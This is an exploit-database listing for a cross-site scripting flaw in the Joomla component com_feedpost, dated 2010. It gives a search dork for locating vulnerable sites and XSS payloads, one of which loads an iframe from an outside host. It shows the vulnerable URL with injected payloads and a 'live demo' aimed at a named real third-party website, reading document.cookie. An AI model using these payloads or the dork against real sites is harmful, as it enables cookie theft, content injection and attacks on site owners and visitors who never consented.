[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_feedpost XSS vulnerability

Author
x0kster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12753
Category
web applications
Date add
17-06-2010
Platform
php
===============================================
Joomla Component com_feedpost XSS vulnerability
===============================================


# Exploit Title: Joomla com_feedpost XSS vulnerability
# Date         : 17 june 2010
# Author       : x0kster (x0kster@gmail.com)
# Dork         : inurl:"feedpost.php?url="


==== XSS EXPLOIT ====

HTML INJECTION: <iframe src=http://own.com/lol.html <
ALERT XSS     : <body onload=alert('xss')>
GENERAL XSS   : <body onload=JAVASCRIP_HERE>

==== VULN IN HERE ====

http://localhost/joomla/components/com_feedpostold/feedpost.php?url=[XSS]

Examples:
http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<iframe src=http://own.com/lol.html <
http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<body onload=alert('Inj3ct0r.com')>



==== LIVE DEMO ====

http://www.universinet.it/components/com_feedpostold/feedpost.php?url=<body onload=alert(document.cookie)>




#  0day.today [2024-10-06]  #